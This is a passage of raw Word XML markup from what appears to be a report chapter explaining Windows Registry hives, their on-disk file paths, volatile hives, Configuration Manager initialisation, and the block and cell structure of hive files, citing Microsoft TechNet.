        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00430F22">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00430F22">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>https://technet.microsoft.com/en-us/library/cc750583.aspx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00430F22" w:rsidRDefault="00430F22">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430F22" w:rsidRDefault="00430F22" w:rsidP="00430F22">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Root keys can correlate to each other, but none of them correlate to their hives. Table 2.2 shows the list of </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hives and their filename</w:t>
      </w:r>
      <w:r w:rsidR="00A738C2">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on system disk.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="10" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4384"/>
        <w:gridCol w:w="4386"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A738C2" w:rsidTr="00A738C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRPr="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A738C2">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Hive </w:t>
            </w:r>
            <w:r w:rsidR="00E41963">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Registry</w:t>
            </w:r>
            <w:r w:rsidRPr="00A738C2">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> Path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRPr="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A738C2">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Hive File Path</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A738C2" w:rsidTr="00A738C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00A738C2">
              <w:t>HKEY_LOCAL_MACHINE \SYSTEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="2A2A2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>\%windir%\system32\config\system</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A738C2" w:rsidTr="00A738C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00A738C2">
              <w:t>HKEY_LOCAL_MACHINE \SAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="2A2A2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>\%windir%\system32\config\sam</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A738C2" w:rsidTr="00A738C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00A738C2">
              <w:t>HKEY_LOCAL_MACHINE \SECURITY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="2A2A2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>\%windir%\system32\config\security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A738C2" w:rsidTr="00A738C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00A738C2">
              <w:t>HKEY_LOCAL_MACHINE \SOFTWARE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="2A2A2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>\%windir%\system32\config\software</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A738C2" w:rsidTr="00A738C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00A738C2">
              <w:t>HKEY_LOCAL_MACHINE \HARDWARE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="2A2A2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Volatile hive</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A738C2" w:rsidTr="00A738C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00A738C2">
              <w:t>HKEY_LOCAL_MACHINE \SYSTEM \Clone</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="2A2A2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Volatile hive</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A738C2" w:rsidTr="00A738C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00A738C2">
              <w:t>HKEY_USERS \UserProfile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="2A2A2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Profile; usually under \%windir%\profiles\usere</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A738C2" w:rsidTr="00A738C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00A738C2">
              <w:t>HKEY_USERS.DEFAULT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00A738C2">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="2A2A2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>\%windir%\system32\config\default</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A738C2" w:rsidRPr="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00A738C2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc485303798"/>
      <w:r w:rsidRPr="00A738C2">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2</w:t>
      </w:r>
      <w:r w:rsidR="00A91688">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A738C2">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> List of </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidRPr="00A738C2">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> hives and their filenames on system disk.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w:rsidR="00A738C2" w:rsidRPr="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00A738C2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A738C2">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00A738C2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>https://technet.microsoft.com/en-us/library/cc750583.aspx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00A738C2">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00F102F2">
        <w:t>system path variable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> “%windir%” links to the path “C:\</w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” in the </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> version </w:t>
      </w:r>
      <w:r w:rsidR="00F102F2">
        <w:t>other than NT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and it links to “C:\WinNT\” in </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F102F2">
        <w:t xml:space="preserve">NT 4 and </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00F102F2">
        <w:t xml:space="preserve"> 2000</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00503832">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidR="00503832">
        <w:t xml:space="preserve"> filename does not have extension, and they cannot be read or write </w:t>
      </w:r>
      <w:r w:rsidR="00A067CE">
        <w:t xml:space="preserve">by normal computer user (without administrator rights). The </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidR="00A067CE">
        <w:t xml:space="preserve"> path that </w:t>
      </w:r>
      <w:r w:rsidR="004534AE">
        <w:t>is defined as</w:t>
      </w:r>
      <w:r w:rsidR="00A067CE">
        <w:t xml:space="preserve"> “Volatile hive” does not have any file stored on the system disk, it is just a</w:t>
      </w:r>
      <w:r w:rsidR="001C670A">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00A067CE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C670A">
        <w:t>image</w:t>
      </w:r>
      <w:r w:rsidR="00A067CE">
        <w:t xml:space="preserve"> that will be loaded</w:t>
      </w:r>
      <w:r w:rsidR="001C670A">
        <w:t xml:space="preserve"> to system memory</w:t>
      </w:r>
      <w:r w:rsidR="00A067CE">
        <w:t xml:space="preserve"> when the system boot</w:t>
      </w:r>
      <w:r w:rsidR="001C670A">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00A067CE">
        <w:t xml:space="preserve">, and it </w:t>
      </w:r>
      <w:r w:rsidR="001C670A">
        <w:t>contents</w:t>
      </w:r>
      <w:r w:rsidR="00A067CE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C670A">
        <w:t>might be changed every time there is any change made by the system</w:t>
      </w:r>
      <w:r w:rsidR="00A067CE">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="001C670A">
        <w:t xml:space="preserve">For example, the hive HKEY_LOCAL_MACHINE \HARDWARD, which stores information about physical devices and the </w:t>
      </w:r>
      <w:r w:rsidR="00B9013B">
        <w:t>devices’ resources, is a volatile hive. The resource assignment to the device and the hardware detection occur every time the system boots, so storing this data on disk is not necessary, and this data might be changed every time there is an installation or uninstallation of hardware devices.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B9013B" w:rsidRDefault="009862B5" w:rsidP="00A738C2">
      <w:r>
        <w:t xml:space="preserve">The heart of the </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the HKEY_LOCAL_MACHINE \SYSTEM hive. The subkey \CurrentControlSet\Control which is a node in HKEY_LOCAL_MACHINE \SYSTEM, contains settings that Configuration Manager uses to initialize the </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The Configuration Manager </w:t>
      </w:r>
      <w:r w:rsidR="00994A2F">
        <w:t xml:space="preserve">is a kernel subsystem which is responsible for implementing, initializing, managing and organizing the </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidR="00994A2F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1167599604"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00994A2F">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00994A2F">
            <w:instrText xml:space="preserve"> CITATION Mic2 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00994A2F">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00994A2F">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(7)</w:t>
          </w:r>
          <w:r w:rsidR="00994A2F">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00994A2F">
        <w:t xml:space="preserve">. To initialize </w:t>
      </w:r>
      <w:r w:rsidR="00994A2F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidR="00994A2F">
        <w:t>, the Configuration Manger locates the hives’ files, creates the root keys</w:t>
      </w:r>
      <w:r w:rsidR="00D14275">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00994A2F">
        <w:t xml:space="preserve">then link the hives together for building the </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidR="00994A2F">
        <w:t xml:space="preserve"> structure. To locate the hives’ files, Configuration Manger refers to the value HKEY_LOCAL_MACHINE \SYSTEM \CurrentControlSet \Control \hivelist. A special type of key call “symbolic link” makes it possible for the Configuration Manager to link hives together as well as organize the </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidR="00994A2F">
        <w:t>. A symbolic link is a key that redirects Configuration Manager t</w:t>
      </w:r>
      <w:r w:rsidR="00AC114D">
        <w:t>o another key. For example, HKEY</w:t>
      </w:r>
      <w:r w:rsidR="00994A2F">
        <w:t>_LOCAL_MACHINE \SAM is a symbolic link to the key at the root of SAM hive.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994A2F" w:rsidRDefault="00994A2F" w:rsidP="00A738C2"/>
    <w:p w:rsidR="00AC114D" w:rsidRPr="00AC114D" w:rsidRDefault="00AC114D" w:rsidP="00A738C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC114D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Hive Structure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B9013B" w:rsidRDefault="00AC114D" w:rsidP="00A738C2">
      <w:r>
        <w:t xml:space="preserve">Configuration Manager divides a hive into </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t xml:space="preserve">allocation units called “blocks” in much the same way that system divides a disk into clusters. A Registry block has a size of 4096 bytes (4KB). When a hive </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E41963">
        <w:t>has to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E41963">
        <w:t xml:space="preserve"> expand its size, it will expand the size in block-granular increments. The first block of a hive is called “base block”. </w:t>
      </w:r>
      <w:r w:rsidR="00D01F87">
        <w:t xml:space="preserve">In many ways </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D01F87">
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D01F87">
        <w:t xml:space="preserve"> the PE header, the first hive first block contains a magic signature call “regf”, which stands for “Registry File”, for identifying the file as a Registry hive file. The base block also stores information about the timestamp showing the last time a write operation has been initiated on the hive</w:t>
      </w:r>
      <w:r w:rsidR="003B77C9">
        <w:t>, a hive format version number, a checksum, a file’s full name</w:t>
      </w:r>
      <w:r w:rsidR="00D14275">
        <w:t xml:space="preserve"> (e.g., </w:t>
      </w:r>
      <w:r w:rsidR="003B77C9">
        <w:t xml:space="preserve">SystemRoot\CONFIG\SAM), </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003B77C9">
        <w:t>an update sequence numbers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003B77C9">
        <w:t>, …</w:t>
      </w:r>
      <w:r w:rsidR="00D01F87">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="003B77C9">
        <w:t>The hive format version number indicates the data format within the hive. Hive formats has changed from NT 3.51 to NT 4.0</w:t>
      </w:r>
      <w:r w:rsidR="00D01F87">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B77C9">
        <w:t>since the presence of Windows NT 4.0. Whether we want to load an old NT 3.51 type hive file under a windows operation system which version is higher than Windows NT 4.0, the system will return an error.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F102F2" w:rsidRDefault="00E364D7" w:rsidP="00A738C2">
      <w:r>
        <w:t xml:space="preserve">Since Windows NT, Microsoft has organized the Registry </w:t>
      </w:r>
      <w:r w:rsidR="00D14275">
        <w:t>hive in small containers called “cells”. A cell holds a key, a value, a security descriptor, a list of subkeys or a list of key values. The first field of the cell contains the data’s type. Table 2.3 describes each cell data types in a clear detail.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="10" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4384"/>
        <w:gridCol w:w="4386"/>
      </w:tblGrid>
      <w:tr w:rsidR="00325366" w:rsidTr="00325366">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00325366" w:rsidRPr="00325366" w:rsidRDefault="00325366" w:rsidP="00A738C2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00325366">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Cell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00325366" w:rsidRPr="00325366" w:rsidRDefault="00325366" w:rsidP="00A738C2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00325366">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Data Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00325366" w:rsidTr="00325366">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00325366" w:rsidRDefault="00325366" w:rsidP="00A738C2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00325366">
              <w:t>Key cell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00325366" w:rsidRDefault="00325366" w:rsidP="00A738C2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00325366">
              <w:t xml:space="preserve">A cell that contains a Registry key, also called a </w:t>
            </w:r>
            <w:r w:rsidR="00325EC6">
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="00325366">
              <w:t>key node</w:t>
            </w:r>
            <w:r w:rsidR="00325EC6">
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00325366">
              <w:t>. A key cell contains a signature (</w:t>
            </w:r>
            <w:r w:rsidR="00325EC6">
              <w:t>known as “</w:t>
            </w:r>
            <w:r w:rsidRPr="00325366">
              <w:t>kn</w:t>
            </w:r>
            <w:r w:rsidR="00325EC6">
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00325366">
              <w:t xml:space="preserve"> for a key, </w:t>
            </w:r>
            <w:r w:rsidR="00325EC6">
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="00325366">
              <w:t>kl</w:t>
            </w:r>
            <w:r w:rsidR="00325EC6">
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00325366">
              <w:t xml:space="preserve"> for a symbolic link), the timestamp of the most recent update to the key, the cell index of the key's parent key cell, the cell index of the sub- key-list cell that identifies the key's subkeys, a cell index for the key's security descriptor cell, a cell index for a string key that </w:t>
            </w:r>
            <w:r w:rsidRPr="00325366">
              <w:lastRenderedPageBreak/>
              <w:t>specifies the class name of the key, and the name of the key (e.g., CurrentControlSet).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00325366" w:rsidTr="00325366">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00325366" w:rsidRDefault="00325366" w:rsidP="00A738C2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00325366">
              <w:lastRenderedPageBreak/>
              <w:t>Value cell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
